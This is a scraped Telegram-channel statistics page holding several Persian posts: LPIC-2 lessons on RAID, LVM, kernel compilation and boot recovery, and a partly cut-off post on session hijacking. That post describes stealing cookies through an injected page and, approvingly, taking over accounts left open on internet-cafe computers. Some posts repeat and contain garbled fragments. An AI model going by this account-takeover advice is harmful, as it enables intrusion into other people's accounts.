ar
Feedback
شبکه پیشرفته | Network_advanced

شبکه پیشرفته | Network_advanced

الذهاب إلى القناة على Telegram

🔒 فراتر از یک اتصال ساده. آموزش مفاهیم پیشرفته شبکه، امنیت سایبری و محافظت از داده‌ها در دنیای ناامن امروز. 🛡 نبض امنیت زیرساخت‌های دیجیتال در دست شماست. پیج اینستاگرام: https://instagram.com/network_adnvanced تبلیغات در مجموعه: @ShabTab_ads

إظهار المزيد
2 532
المشتركون
-224 ساعات
-77 أيام
-2130 أيام

جاري تحميل البيانات...

جذب المشتركين
سبتمبر '26
سبتمبر '260
في 0 قنوات
أغسطس '26
+9
في 0 قنوات
Get PRO
يوليو '26
+20
في 0 قنوات
Get PRO
يونيو '26
+16
في 0 قنوات
Get PRO
مايو '26
+11
في 0 قنوات
Get PRO
أبريل '26
+9
في 0 قنوات
Get PRO
مارس '26
+11
في 0 قنوات
Get PRO
فبراير '26
+742
في 3 قنوات
Get PRO
يناير '26
+4
في 0 قنوات
Get PRO
ديسمبر '25
+6
في 0 قنوات
Get PRO
نوفمبر '25
+13
في 0 قنوات
Get PRO
أكتوبر '25
+12
في 0 قنوات
Get PRO
سبتمبر '25
+9
في 0 قنوات
Get PRO
أغسطس '25
+6
في 0 قنوات
Get PRO
يوليو '25
+9
في 0 قنوات
Get PRO
يونيو '25
+6
في 0 قنوات
Get PRO
مايو '25
+8
في 0 قنوات
Get PRO
أبريل '25
+8
في 0 قنوات
Get PRO
مارس '25
+10
في 0 قنوات
Get PRO
فبراير '25
+5
في 0 قنوات
Get PRO
يناير '25
+25
في 0 قنوات
Get PRO
ديسمبر '24
+16
في 0 قنوات
Get PRO
نوفمبر '24
+15
في 0 قنوات
Get PRO
أكتوبر '24
+15
في 0 قنوات
Get PRO
سبتمبر '24
+13
في 0 قنوات
Get PRO
أغسطس '24
+112
في 13 قنوات
Get PRO
يوليو '24
+193
في 21 قنوات
Get PRO
يونيو '240
في 27 قنوات
Get PRO
مايو '240
في 8 قنوات
Get PRO
أبريل '240
في 4 قنوات
Get PRO
مارس '24
+1
في 0 قنوات
Get PRO
فبراير '240
في 0 قنوات
Get PRO
يناير '240
في 0 قنوات
Get PRO
ديسمبر '230
في 0 قنوات
Get PRO
نوفمبر '230
في 0 قنوات
Get PRO
أكتوبر '230
في 0 قنوات
Get PRO
سبتمبر '230
في 0 قنوات
Get PRO
أغسطس '230
في 0 قنوات
Get PRO
يوليو '230
في 0 قنوات
Get PRO
يونيو '230
في 0 قنوات
Get PRO
مايو '230
في 0 قنوات
Get PRO
أبريل '230
في 0 قنوات
Get PRO
مارس '230
في 0 قنوات
Get PRO
فبراير '230
في 0 قنوات
Get PRO
يناير '230
في 0 قنوات
Get PRO
ديسمبر '22
+2
في 0 قنوات
Get PRO
نوفمبر '22
+7
في 0 قنوات
Get PRO
أكتوبر '22
+4
في 0 قنوات
Get PRO
سبتمبر '22
+4
في 0 قنوات
Get PRO
أغسطس '22
+4
في 0 قنوات
Get PRO
يوليو '22
+7
في 0 قنوات
Get PRO
يونيو '22
+204
في 0 قنوات
Get PRO
مايو '22
+2 163
في 0 قنوات
Get PRO
أبريل '22
+288
في 0 قنوات
Get PRO
مارس '22
+1 196
في 0 قنوات
Get PRO
فبراير '22
+1 601
في 0 قنوات
Get PRO
يناير '22
+1 364
في 0 قنوات
Get PRO
ديسمبر '21
+1 051
في 0 قنوات
Get PRO
نوفمبر '21
+925
في 0 قنوات
Get PRO
أكتوبر '21
+367
في 0 قنوات
Get PRO
سبتمبر '21
+422
في 0 قنوات
Get PRO
أغسطس '21
+1 330
في 0 قنوات
Get PRO
يوليو '21
+662
في 0 قنوات
Get PRO
يونيو '21
+2 811
في 0 قنوات
التاريخ
نمو المشتركين
الإشارات
القنوات
03 سبتمبر0
02 سبتمبر0
01 سبتمبر0
\n\nحالا هر کی اون صفحه رو ببینه، بی‌خبر کوکیش میاد پیش من. بعد من با اون کوکی می‌رم تو سایت. تموم شد. تبریک می‌گم، من الان تویی!\n\n---\n\nروش دوم: ابزارایی که کارو واست راحت می‌کنن\n\nشاید کدنویسی بلد نباشی، نگران نباش. یکی برات ابزار ساخته:\n\n· EditThisCookie: یه افزونه کروم. می‌تونی کوکی رو ببینی، عوض کنی، هر کاری دوست داری بکنی\n· Cookie-Editor: همون کارو می‌کنه فقط تمیزتر\n· Wireshark: این دیگه حرفه‌ایاس. اگه بلد باشی باهاش کار کنی، هیچی ازت قایم نمی‌شه\n\n---\n\nروش سوم: کافی‌نت یادت نره\n\nرفتی کافی‌نت، یه نفر قبلاً اونجا بوده و حساب دیوارش یا روبیکا یا حتی ایمیل خودش رو باز کرده. بلند شده رفته ولی مرورگر رو نبسته. احمق بوده دیگه. تو می‌آی بشینی پای همون سیستم. مرورگر رو که باز می‌کنی، می‌بینی هنوز تو حساب اون آدمی!\n\nحالا چکار می‌کنی؟\n\n· می‌ری پیام‌هاش رو می‌خونی\n· آگهی می‌زاری به اسم خودش تو دیوار\n· به دوستاش پیام می‌دی تو روبیکا\n· اگه سایت اجازه بده، پسوردش رو عوض می‌کنی\n\nهمش با یه کوکی که مونده تو مرورگر. به خدا اینقدر ساده اس که گاهی خودم خنده‌م می‌گیره.\n\n---\n\nچطور جلوش رو بگیریم؟ (اگه نمی‌خوای بدبخت بشی)\n\nاگه کاربری:\n\n· مرورگر رو کامل ببند. فقط تب رو نبند\n· از حالت ناشناس استفاده کن\n· بعد کار حتماً Logout بزن\n· به HTTPS سایتا دقت کن. اون قفل سبز یعنی امنه\n\nاگه برنامه‌نویسی:\n\n· کوکی رو HttpOnly کن\n· Secure flag رو بذار\n· Session رو زود منقضی کن\n· ۲FA بذار برا سایتت\n\n---\n\nحرف آخر:\n\nSession دزدی یعنی یکی میاد کوکی تو رو می‌گیره و می‌ره تو حسابت. نه پسوردتو می‌خواد، نه ایمیلتو. فقط کافیه تو یه لحظه غافل باشی.\n\nپس:\n\n· Logout یادت نره\n· مرورگرتو باز نذار\n· ۲FA بزن\n· تو کافی‌نتا مراقب باش\n\n---\n\n#SessionHijacking #WebSecurity #XSS #هک #امنیت\n\nهزاران آموزش شبکه و امنیت:\n@Network_advanced","datePublished":"2026-02-27T21:41:46Z","dateModified":"2026-02-27T21:41:46Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":63},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3658","url":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3658","mainEntityOfPage":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3658","headline":"LPIC‑2 | Lesson 4 ### درس ۴: معماری ذخیره‌سازی پیشرفته (LVM & RAID) – پادشاهی بر قلمرو دیسک‌ها! اگه هنوز فکر…","articleBody":"LPIC‑2 | Lesson 4\n\n### درس ۴: معماری ذخیره‌سازی پیشرفته (LVM & RAID) – پادشاهی بر قلمرو دیسک‌ها!\n\nاگه هنوز فکر می‌کنی پارتیشن‌بندی یعنی فقط fdisk و ساختن چندتا درایو خشک و خالی، همین الان مدرک لینوکست رو پاره کن! تو LPIC-2، ما دیسک رو به زنجیر می‌کشیم. ما یاد می‌گیریم چطور از ترکیب دیسک‌های داغون، یه ابر-ذخیره‌ساز بسازیم که حتی با سوختن دیسک هم آخ نگه!\n\n#### ۱. زنده کردن مردگان با Software RAID (ابزار mdadm):\nتو دنیای واقعی، دیسک‌ها می‌سوزن. این یه حقیقته. ولی یه مهندس لینوکس طوری سیستم رو می‌چینه که دیتاسنتر آتیش بگیره ولی دیتا نپره!\n* RAID 0 (سرعت مرگبار): دیتا رو تیکه تیکه می‌کنه روی دیسک‌ها. سرعت عالی، ولی اگه یه دیسک بسوزه، فاتحه کل دیتا خونده‌ست. (فقط برای کش و تمپ!)\n* RAID 1 (آینه): هر چی تو این بنویسی، تو اون یکی هم کپی می‌شه. امنیت ۱۰۰٪، ولی نصف ظرفیتت می‌پره.\n* RAID 5 & 6 (تعادل قدرت): استفاده از Parity. تو RAID 5 یک دیسک و تو RAID 6 دو دیسک همزمان بسوزن، سیستم عین ساعت کار می‌کنه.\n* فرمان عملیاتی: mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/sdb1 /dev/sdc1 /dev/sdd1\n* مانیتورینگ وضعیت: همیشه چشمت به /proc/mdstat باشه. اگه دیدی نوشته [U_U], یعنی یکی از دیسک‌هات مرخص شده و باید سریع جایگزینش کنی!\n\n#### ۲. انعطاف مطلق با LVM (Logical Volume Manager):\nLVM یعنی آزادی! یعنی وقتی پارتیشن /var پر شد، لازم نیست سرور رو خاموش کنی یا پارتیشن رو دیلیت کنی.\n* سلسله مراتب قدرت:\n 1. PV (Physical Volume): تبدیل پارتیشن‌های خام به خمیر بازی لینوکس! (pvcreate /dev/sdb1)\n 2. VG (Volume Group): ریختن همه PVها تو یه ظرف بزرگ. انگار یه دیسک غول‌آسا داری. (vgcreate my_data /dev/sdb1 /dev/sdc1)\n 3. LV (Logical Volume): بریدن تکه‌های دلخواه از اون ظرف بزرگ. (lvcreate -L 100G -n web_data my_data)\n* افزایش حجم در حال پرواز (On-the-fly):\n lvextend -L +50G /dev/my_data/web_data -r\n اون سوئیچ -r معجزه‌ست! همزمان هم حجم رو زیاد می‌کنه، هم فایل‌سیستم رو (بدون Unmount کردن!).\n\n#### ۳. سفر در زمان با LVM Snapshots:\nاین یکی از خطرناک‌ترین و جذاب‌ترین ویژگی‌های LVM هست. می‌خوای آپدیت سنگین بزنی و می‌ترسی سیستم بترکه؟ یه Snapshot بگیر!\nlvcreate -s -n backup_before_update -L 5G /dev/my_data/web_data\nحالا یه \"تصویر\" از لحظه حال داری. اگه گند زدی، می‌تونی برگردی به عقب (Rollback). این یعنی بیمه‌ی عمر دیتای تو!\n\n#### ۴. عیب‌یابی و جراحی دیسک‌های خراب:\nوقتی یه دیسک تو RAID می‌سوزه، نباید دست و پات رو گم کنی.\n1. دیسک خراب رو Fail کن: mdadm /dev/md0 --fail /dev/sdb1\n2. دیسک رو خارج کن: mdadm /dev/md0 --remove /dev/sdb1\n3. دیسک جدید رو بنداز و اضافه کن: mdadm /dev/md0 --add /dev/sde1\nحالا بشین و تماشا کن که چطور سیستم خودش رو بازسازی (Rebuild) می‌کنه.\n\nمهندسی دیسک یعنی تو هیچ‌وقت غافلگیر نمی‌شی. تو همیشه یه نقشه جایگزین داری. تو به دیسک‌ها دستور می‌دی، نه اونا به تو! قدرت مدیریت ذخیره‌سازی، قلب تپنده هر دیتاسنتره.\n\nری‌اکشن‌ها رو بترکونید که درس ۵ قراره بریم سراغ اعماق شبکه و فایروال‌های پیشرفته!\n\nهزاران آموزش شبکه و امنیت (مخصوص کسانی که دیسک‌ها رو به زانو درمی‌آورند):\n@Network_advanced\n\n#LPIC2 #LVM #RAID #Mdadm #StorageArchitecture #SysAdmin #AdvancedLinux #DiskManagement #Snapshot #DataRecovery","datePublished":"2026-02-27T16:43:59Z","dateModified":"2026-02-27T16:43:59Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":87},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":7}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3657","url":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3657","mainEntityOfPage":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3657","headline":"LPIC‑2 | Lesson 3 ### درس ۳: احیای سیستم و عیب‌یابی بوت پیشرفته (System Startup Recovery) – بازگرداندن مُرده…","articleBody":"LPIC‑2 | Lesson 3\n\n### درس ۳: احیای سیستم و عیب‌یابی بوت پیشرفته (System Startup Recovery) – بازگرداندن مُرده از گور!\n\nوقتی سرور اصلی دیتاسنتر بالا نمیاد، وقتی همه از ناامیدی سرشون رو می‌گیرن، اونجاست که تو، یک مهندس LPIC-2، وارد میدون می‌شی. اینجا دیگه خبری از reboot نیست؛ اینجا بحث بازگشت به زندگی در شرایط بحرانیه.\n\n#### ۱. ورود به دنیای GRUB2 Shell (غار اسرارآمیز بوت):\nاگه فایل grub.cfg خراب بشه، سیستم دیگه هیچی نمی‌فهمه. باید مثل یه هکر حرفه‌ای، بری تو GRUB Shell.\n* وقتی گراب بالا میاد، کلید c رو بزن. وارد محیط grub> می‌شی.\n* پیدا کردن بوت لودر: اول باید بدونی کرنل و initrd کجا هستن:\n grub> ls (لیست کردن دیسک‌ها و پارتیشن‌ها)\n grub> ls (hd0,1)/boot/ (شاید اینجا باشه!)\n* بوت دستی (Manual Boot): حالا که فهمیدی کرنل و initrd کجا پنهان شدن، دستی سیستم رو بوت کن:\n grub> set root=(hd0,1) (پارتیشن روت رو مشخص کن)\n grub> linux /boot/vmlinuz-$(uname -r) root=/dev/sda1 ro (آدرس کرنل و روت واقعی سیستم رو بده، ro یعنی Read-Only)\n grub> initrd /boot/initramfs-$(uname -r).img (آدرس initramfs رو بده)\n grub> boot (اگه همه چی درست بود، سیستم بالا میاد!)\n فاجعه: اگه بعد از بوت، سیستم بالا اومد و فهمیدی اشتباه کردی، قبل از اینکه بره تو حالت Read-Only، سریع rw (Read-Write) کن و گراب رو ترمیم کن.\n\n#### **۲. گریز از سیستم‌عامل با rd.break و systemd.unit=rescue.target:**\nدور زدن پسورد روت:ت:** فرض کن پسورد روت رو فراموش کردی، یا یکی خرابکاری کرده و پسورد رو عوض کرده. ری‌بوت کن، تو گراب خط linux رو پیدا کن، آخرش rd.break رو اضافه کن.\n ... ro crashkernel=auto rd.break\n حالا تو محیط initramfs هستی. اینجا روت (/) سیستم عامل شما نیست، بلکه یه محیط موقته.\n mount -o remount,rw /sysroot (فایل‌سیستم اصلی رو برای نوشتن مانت کن)\n chroot /sysroot (وارد محیط سیستم عامل اصلی شو)\n passwd root (پسورد روت رو عوض کن!)\n touch /.autorelabel (اگر SELinux فعاله، تا لیبل‌ها درست بشن)\n exit (از chroot خارج شو)\n exit (از initramfs خارج شو، سیستم ادامه بوت میده)\n* **Rescue Mode با systemd:** برای ورود به حداقل‌ترین حالت سیستم‌عامل (فقط سرویس‌های ضروری):\n ... ro crashkernel=auto systemd.unit=rescue.target\n اینجا می‌تونی با حداقل سرویس‌ها، مشکل رو ریشه‌یابی و حل کنی.\n\n#### **۳. بازگرداندن فایل‌سیستم از مرگ با fsck -b:**\nیکی از رایج‌ترین دلایل بالا نیامدن سرور، خراب شدن Superblock فایل‌سیستمه. Superblock مثل فهرست اصلی کتابه؛ اگه خراب بشه، سیستم دیگه نمی‌دونه فایل‌ها کجپیدا کردن سوپربلاک‌های پشتیبان:ی پشتیبان:** هر فایل‌سیستم ext کپی‌های پشتیبان از Superblock داره. این دستور آدرسشون رو بهت می‌ده:\n mke2fs -n /dev/sda1 (به جای sda1 پارتیشن مورد نظرت رو بزن)\n خروجی یه سری عدد بهت می‌ده (مثلاً 23456, 45678, ...).\n* **ترمیم با پشتیبان:** حالا با یکی از اون اعداد، فایل‌سیستم رو ترمیم کن:\n fsck -b 23456 /dev/sda1\n این یعنی داری با یه کپی سالم از Superblock، دیسک مُرده رو به زندگی برمی‌گردونی!\n\nوقتی سیستمت می‌میره و تو با این دستورات جادویی، نفس رو بهش برمی‌گردونی، وقتی می‌تونی مثل یه جراح، قلب لینوکس رو در حال خونریزی ترمیم کنی، اونجاست که معنی واقعی LPIC-2 رو می‌فهمی. تو دیگه یه ادمناجی سیستمه **ناجی سیستم** هستی!\n\nری‌اکشن‌ها رو بکوب تا بریم برای درس بعدی که قراره وارد قلمروی شبکه بشیم و با فایروال و پکت‌ها بازی کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها و ناجیان سیستم):\n@Network_advanced\n\n#LPIC2 #BootRecovery #GRUB2 #Initramfs #Fsck #SystemRescue #HardcoreLinux #Troubleshooting","datePublished":"2026-02-27T16:40:47Z","dateModified":"2026-02-27T16:40:47Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":87},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":5}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3656","url":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3656","mainEntityOfPage":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3656","headline":"LPIC‑2 | Lesson 2 ### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم! اگه…","articleBody":"LPIC‑2 | Lesson 2\n\n### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!\n\nاگه فکر می‌کنی با apt install و yum update لینوکس رو می‌شناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیش‌فرض گله دارن، خودش آستین بالا می‌زنه و کرنل رو دوباره می‌نویسه! این دیگه بازی بچه‌ها نیست، این نفوذ به عمیق‌ترین لایه‌های سیستم‌عامله.\n\n#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)\nاولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.\nاونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.\n* بازی با پرچم‌ها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو می‌خوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. می‌خوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکل‌های شبکه که کمتر استفاده میشن رو [M] می‌گیریم).\n* حذف ماژول‌های مُرده: می‌تونی درایورهای سخت‌افزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!\n\n#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)\nحالا که انتخاب‌هات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:\nmake -j$(nproc) && make modules_install && make install\n* **راز $(nproc):** این دستور تعداد هسته‌های CPUت رو برمی‌گردونه. با -j داری به make می‌گیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریع‌ترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.\nبعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار می‌گیره. ماژول‌ها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.\n\n#### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):**\nگاهی وقتا نمی‌تونی سرور رو ری‌بوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل می‌کافزایش سقف فایل‌های باز (File Descriptors):tors):** برای دیتابیس‌های بزرگ یا وب‌سرورهای پربازدید:\n echo \"fs.file-max = 1000000\" >> /etc/sysctl.conf\n sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف می‌کفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):**\n echo \"net.ipv4.ip_forward = 1\" >> /etc/sysctl.conf\n sysctl -p\n* **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند می‌شه، می‌تونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیش‌فرض ۶۰):\n echo \"vm.swappiness = 10\" >> /etc/sysctl.conf\n sysctl -p\n **نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی می‌کنه از RAM استفاده کنه.\n\nوقتی هسته رو طوری تنظیم می‌کنی که ذره‌ای از منابع سیستمت هدر نره، وقتی می‌تونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بی‌حد و حصر.\n\nری‌اکشن‌ها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفه‌ای‌ها):\n@Network_advanced\n\n#LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking","datePublished":"2026-02-27T16:36:57Z","dateModified":"2026-02-27T16:36:57Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":85},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3655","url":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3655","mainEntityOfPage":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3655","headline":"LPIC‑2 | Lesson 2 ### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم! اگه…","articleBody":"LPIC‑2 | Lesson 2\n\n### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!\n\nاگه فکر می‌کنی با apt install و yum update لینوکس رو می‌شناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیش‌فرض گله دارن، خودش آستین بالا می‌زنه و کرنل رو دوباره می‌نویسه! این دیگه بازی بچه‌ها نیست، این نفوذ به عمیق‌ترین لایه‌های سیستم‌عامله.\n\n#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)\nاولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.\nاونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.\n* بازی با پرچم‌ها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو می‌خوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. می‌خوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکل‌های شبکه که کمتر استفاده میشن رو [M] می‌گیریم).\n* حذف ماژول‌های مُرده: می‌تونی درایورهای سخت‌افزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!\n\n#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)\nحالا که انتخاب‌هات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:\nmake -j$(nproc) && make modules_install && make install\n* راز $(nproc): این دستور تعداد هسته‌های CPUت رو برمی‌گردونه. با -j داری به make می‌گیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریع‌ترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.\nبعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار می‌گیره. ماژول‌ها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.\n\n#### ۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):\nگاهی وقتا نمی‌تونی سرور رو ری‌بوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل می‌کافزایش سقف فایل‌های باز (File Descriptors):tors):** برای دیتابیس‌های بزرگ یا وب‌سرورهای پربازدید:\n echo \"fs.file-max = 1000000\" >> /etc/sysctl.conf\n sysctl -p (برای اعمال فواخطار:اخطار: این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف می‌کفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):\n echo…","datePublished":"2026-02-27T16:34:14Z","dateModified":"2026-02-27T16:35:16Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ar/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3654","url":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3654","mainEntityOfPage":"https://telemetr.io/ar/channels/1458308447-network_advanced/posts/3654","headline":"LPIC‑2 | Lesson 2 درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management)**، این بار با چاشنی وحشی‌گری بیش…","articleBody":"LPIC‑2 | Lesson 2\n\nدرس ۲: جراحی هسته لینوکس (Kernel Compilation & Management)**، این بار با چاشنی وحشی‌گری بیشتر و جزئیات دقیق، آماده برای تلگرام.\n\n---\n\n### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!\n\nاگه فکر می‌کنی با apt install و yum update لینوکس رو می‌شناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیش‌فرض گله دارن، خودش آستین بالا می‌زنه و کرنل رو دوباره می‌نویسه! این دیگه بازی بچه‌ها نیست، این نفوذ به عمیق‌ترین لایه‌های سیستم‌عامله.\n\n#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)\nاولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.\nاونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.\n* بازی با پرچم‌ها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو می‌خوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. می‌خوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکل‌های شبکه که کمتر استفاده میشن رو [M] می‌گیریم).\n* حذف ماژول‌های مُرده: می‌تونی درایورهای سخت‌افزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!\n\n#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)\nحالا که انتخاب‌هات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:\nmake -j$(nproc) && make modules_install && make install\n* **راز $(nproc):** این دستور تعداد هسته‌های CPUت رو برمی‌گردونه. با -j داری به make می‌گیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریع‌ترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.\nبعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار می‌گیره. ماژول‌ها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید 